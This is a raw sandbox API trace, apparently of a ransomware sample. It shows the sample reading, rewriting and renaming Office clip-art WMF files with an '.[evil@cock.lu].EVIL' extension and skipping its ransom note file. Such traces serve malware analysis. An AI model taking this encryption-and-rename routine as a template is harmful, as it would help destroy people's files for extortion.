[0146.620] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.620] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x3740, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3740, lpOverlapped=0x0) returned 1 [0146.620] CloseHandle (hObject=0x1a8) returned 1 [0146.620] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152430.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.620] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.620] __uncaught_exception () returned 0x84b1160800 [0146.620] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.621] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152430.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152430.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152430.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152430.wmf.[evil@cock.lu].evil")) returned 1 [0146.621] ??_V@YAXPEAX@Z () returned 0x1 [0146.624] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152430.WMF", dwFileAttributes=0x200) returned 0 [0146.624] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.624] wcsstr (_Str="J0152432.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.624] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152432.WMF") returned 69 [0146.624] wcscmp (_String1="J0152432.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.624] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0152432.WMF") returned 0x0 [0146.624] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152432.WMF") returned 0x45 [0146.624] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152432.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152432.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.626] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x406c, lpOverlapped=0x0) returned 1 [0146.629] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.629] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.629] _errno () returned 0x84b1160840 [0146.629] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.629] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x4080, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4080, lpOverlapped=0x0) returned 1 [0146.629] CloseHandle (hObject=0x1a8) returned 1 [0146.629] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152432.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.629] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.630] __uncaught_exception () returned 0x84b1160800 [0146.630] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.630] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152432.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152432.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152432.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152432.wmf.[evil@cock.lu].evil")) returned 1 [0146.631] ??_V@YAXPEAX@Z () returned 0x1 [0146.634] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152432.WMF", dwFileAttributes=0x200) returned 0 [0146.634] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.634] wcsstr (_Str="J0152436.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.634] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152436.WMF") returned 69 [0146.634] wcscmp (_String1="J0152436.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.634] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0152436.WMF") returned 0x0 [0146.634] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152436.WMF") returned 0x45 [0146.634] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152436.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152436.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.636] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2c4c, lpOverlapped=0x0) returned 1 [0146.639] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.639] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.639] _errno () returned 0x84b1160840 [0146.639] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.639] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x2c60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2c60, lpOverlapped=0x0) returned 1 [0146.639] CloseHandle (hObject=0x1a8) returned 1 [0146.639] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152436.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.640] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.640] __uncaught_exception () returned 0x84b1160800 [0146.640] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.640] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152436.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152436.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152436.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152436.wmf.[evil@cock.lu].evil")) returned 1 [0146.641] ??_V@YAXPEAX@Z () returned 0x1 [0146.644] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152436.WMF", dwFileAttributes=0x200) returned 0 [0146.644] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.644] wcsstr (_Str="J0152556.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.644] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152556.WMF") returned 69 [0146.644] wcscmp (_String1="J0152556.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.644] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0152556.WMF") returned 0x0 [0146.644] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152556.WMF") returned 0x45 [0146.644] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152556.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152556.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.647] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4030, lpOverlapped=0x0) returned 1 [0146.649] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.649] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.649] _errno () returned 0x84b1160840 [0146.649] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.649] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x4040, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4040, lpOverlapped=0x0) returned 1 [0146.650] CloseHandle (hObject=0x1a8) returned 1 [0146.650] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152556.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.650] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.650] __uncaught_exception () returned 0x84b1160800 [0146.650] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.650] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152556.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152556.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152556.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152556.wmf.[evil@cock.lu].evil")) returned 1 [0146.651] ??_V@YAXPEAX@Z () returned 0x1 [0146.654] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152556.WMF", dwFileAttributes=0x200) returned 0 [0146.654] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.654] wcsstr (_Str="J0152558.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.654] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152558.WMF") returned 69 [0146.654] wcscmp (_String1="J0152558.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.654] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0152558.WMF") returned 0x0 [0146.654] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152558.WMF") returned 0x45 [0146.654] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152558.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152558.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.656] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3eb4, lpOverlapped=0x0) returned 1 [0146.658] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.658] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.658] _errno () returned 0x84b1160840 [0146.658] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.658] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x3ec0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3ec0, lpOverlapped=0x0) returned 1 [0146.658] CloseHandle (hObject=0x1a8) returned 1 [0146.658] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152558.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.659] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.659] __uncaught_exception () returned 0x84b1160800 [0146.659] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.659] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152558.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152558.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152558.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152558.wmf.[evil@cock.lu].evil")) returned 1 [0146.660] ??_V@YAXPEAX@Z () returned 0x1 [0146.662] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152558.WMF", dwFileAttributes=0x200) returned 0 [0146.662] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.662] wcsstr (_Str="J0152560.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.662] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152560.WMF") returned 69 [0146.662] wcscmp (_String1="J0152560.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.663] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0152560.WMF") returned 0x0 [0146.663] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152560.WMF") returned 0x45 [0146.663] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152560.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152560.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.664] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2a80, lpOverlapped=0x0) returned 1 [0146.668] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.668] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.668] _errno () returned 0x84b1160840 [0146.668] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.668] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x2aa0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2aa0, lpOverlapped=0x0) returned 1 [0146.668] CloseHandle (hObject=0x1a8) returned 1 [0146.668] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152560.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.668] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.668] __uncaught_exception () returned 0x84b1160800 [0146.668] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.668] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152560.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152560.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152560.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152560.wmf.[evil@cock.lu].evil")) returned 1 [0146.669] ??_V@YAXPEAX@Z () returned 0x1 [0146.672] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152560.WMF", dwFileAttributes=0x200) returned 0 [0146.672] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.672] wcsstr (_Str="J0152568.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.672] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152568.WMF") returned 69 [0146.672] wcscmp (_String1="J0152568.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.672] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0152568.WMF") returned 0x0 [0146.672] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152568.WMF") returned 0x45 [0146.672] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152568.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152568.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.674] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xe70, lpOverlapped=0x0) returned 1 [0146.678] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.678] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.678] _errno () returned 0x84b1160840 [0146.678] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.678] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0xe80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xe80, lpOverlapped=0x0) returned 1 [0146.678] CloseHandle (hObject=0x1a8) returned 1 [0146.678] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152568.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.679] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.679] __uncaught_exception () returned 0x84b1160800 [0146.679] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.679] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152568.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152568.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152568.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152568.wmf.[evil@cock.lu].evil")) returned 1 [0146.680] ??_V@YAXPEAX@Z () returned 0x1 [0146.682] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152568.WMF", dwFileAttributes=0x200) returned 0 [0146.682] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.682] wcsstr (_Str="J0152570.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.682] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152570.WMF") returned 69 [0146.682] wcscmp (_String1="J0152570.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.682] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0152570.WMF") returned 0x0 [0146.682] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152570.WMF") returned 0x45 [0146.682] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152570.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152570.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.684] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xd28, lpOverlapped=0x0) returned 1 [0146.687] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.687] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.687] _errno () returned 0x84b1160840 [0146.687] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.687] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0xd40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xd40, lpOverlapped=0x0) returned 1 [0146.687] CloseHandle (hObject=0x1a8) returned 1 [0146.687] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152570.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.687] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.687] __uncaught_exception () returned 0x84b1160800 [0146.687] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.688] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152570.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152570.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152570.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152570.wmf.[evil@cock.lu].evil")) returned 1 [0146.688] ??_V@YAXPEAX@Z () returned 0x1 [0146.691] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152570.WMF", dwFileAttributes=0x200) returned 0 [0146.691] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.691] wcsstr (_Str="J0152590.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.691] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152590.WMF") returned 69 [0146.691] wcscmp (_String1="J0152590.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.691] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0152590.WMF") returned 0x0 [0146.691] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152590.WMF") returned 0x45 [0146.691] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152590.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152590.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.693] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2ab4, lpOverlapped=0x0) returned 1 [0146.699] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.699] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.699] _errno () returned 0x84b1160840 [0146.699] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.699] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x2ac0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2ac0, lpOverlapped=0x0) returned 1 [0146.699] CloseHandle (hObject=0x1a8) returned 1 [0146.699] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft 